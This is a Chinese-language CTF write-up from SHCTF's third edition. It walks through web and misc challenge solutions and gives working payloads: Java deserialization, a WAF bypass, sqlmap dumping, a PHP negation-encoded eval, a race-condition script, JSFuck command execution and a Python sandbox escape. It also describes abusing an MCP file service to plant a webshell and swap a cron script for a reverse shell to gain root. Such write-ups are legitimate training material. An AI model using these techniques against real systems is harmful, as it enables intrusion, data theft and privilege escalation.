SHCTF 第三届 Web 赛题部分解题复盘

最终在根目录找到 Flag。

[阶段 3] 你也懂 java？

后端提供 Note.jar，存在未校验的反序列化入口。

攻击思路

ObjectInputStream 直接读取请求体，传入自定义 Note 对象即可触发任意文件读取。无需编译恶意类，可直接构造二进制 Payload。

手动编译 Payload

// Exp.java
public class Exp {
    public static void main(String[] args) throws Exception {
        Note note = new Note("Exploit", "Reading Flag", "/flag");
        FileOutputStream fos = new FileOutputStream("payload.ser");
        ObjectOutputStream oos = new ObjectOutputStream(fos);
        oos.writeObject(note);
    }
}

发送 payload.ser 后成功读取 Flag。

偷懒方案

直接使用十六进制字符串构造 Java 反序列化字节流，省去编译环节：

echo -ne "\xac\xed\x00\x05..." > payload.bin
curl -X POST http://challenge.shc.tf:31865/upload --data-binary @payload.bin | grep SHCTF

[阶段 2] Go

Go 语言编写的验证系统，WAF 拦截了 admin 角色。

WAF 绕过

大小写敏感问题。将参数名改为 Role 即可绕过：

curl "http://challenge.shc.tf:31025/" -d '{"Role":"admin"}'

返回 Flag：SHCTF{2ea0dca2-e397-4c7c-892e-785d30c2e19a}。

[阶段 1] 上古遗迹档案馆

典型的 SQL 注入题目。参数 id=1' 报错，确认注入点。

sqlmap -u "http://challenge.shc.tf:30879/?id=*" --batch -D archive_db -T secret_vault --dump

Flag 位于 secret_key 字段。

[阶段 1] kill_king

网页游戏，前端 JS 控制逻辑，后端 PHP 审计。

前端篡改

控制台输入 _this.damage = 9999; 或直接修改关卡变量跳过战斗。

后端审计

过关时 POST result=win 到 check.php。PHP 代码对 who, are, you 三个 GET 参数进行 eval 处理，且限制字符集。

利用 PHP 函数动态调用特性，结合取反编码绕过正则：

# 生成取反 Payload
import sys, urllib.parse
def negate_payload(data):
    res = ""
    for char in data:
        negated_hex = hex((~ord(char)) & 0xff)[2:].zfill(2)
        res += f"%{negated_hex}"
    return f"(~{res})"

构造 ?who=1&are=2&you=(~system)(~cmd): 形式执行命令。

[阶段 1] ez_race

竞态条件（Race Condition）题目。提现接口有 1 秒延迟，高并发可刷负余额触发 Flag。

并发 Payload

使用 JavaScript 发起多请求，利用事务锁机制前的时间差扣款：

(async()=>{
    const requests = Array.from({length:10}, async(v, i)=>{
        await fetch(withdrawUrl, {method:"POST", body: bodyData});
    });
    await Promise.all(requests);
})();

[阶段 1] calc?js?f**k!

JS 计算器，WAF 过滤除 !、[、] 外的字符。正好满足 JSFuck 语法要求。

JSFuck 利用

通过 jsfuck.com 转换命令为 JSFuck 字符串，利用 process.mainModule.require('child_process') 执行系统命令。

{"expr": "[][(![]+[])...]"}

[阶段 1] Eazy_Pyrunner

Python 代码执行沙箱，包含 WAF 关键词过滤和审计钩子。

审计钩子绕过

sys.modules['os'] 被替换，且 audit_hook 检查事件名。通过劫持全局变量和内置函数绕过限制：

# 劫持 is_my_love_event 返回 True
globals()[bytes([105,115,95,109,121,95,108,111,118,101,95,101,118,101,110,116]).decode()]=lambda x:True
# 劫持 len 返回 0 绕过长度检查
bi[bytes([108,101,110]).decode()]=lambda x:0
# 通过 posix 模块执行 system
s_mod = g[bytes([115,121,115]).decode()]
po_mod = getattr(s_mod, bytes([109,111,100,117,108,101,115]).decode())
s_func = getattr(po_mod, bytes([115,121,115,116,101,109]).decode())
s_func(bytes([105,100]).decode())

[阶段 1] 05_em_v_CFK

Webshell 提权 + 业务逻辑漏洞。

逻辑绕过

index.php 中 $my_money 写死为 3.00，但可通过 Webshell 的 code 参数 include 数据库连接文件，伪造余额为 100.00 购买 Flag。

include '../connect.php'; 
$stmt = $pdo->prepare('CALL buy_item(?, ?)'); 
$stmt->execute([3, 100.00]); 
print_r($stmt->fetch());

[MISC] ezAI

基于 MCP (Model Context Protocol) 的文件操作服务。

文件写入与提权

1. 打点：利用 MCP 的 write_file 功能在 /var/www/html 写入一句话木马。
2. 提权：发现定时任务 /usr/lib/php/sessionclean 权限配置不当（mcp 用户可写），将其替换为反弹 Shell 脚本。
3. 获取 Flag：等待定时任务执行，获得 root 权限访问 /root/flag。

漏洞根源

MCP 服务端路径校验仅检查前缀匹配，导致 /var/www/h 开头的目录均可操作，甚至包括父目录下的其他文件夹，造成路径遍历风险。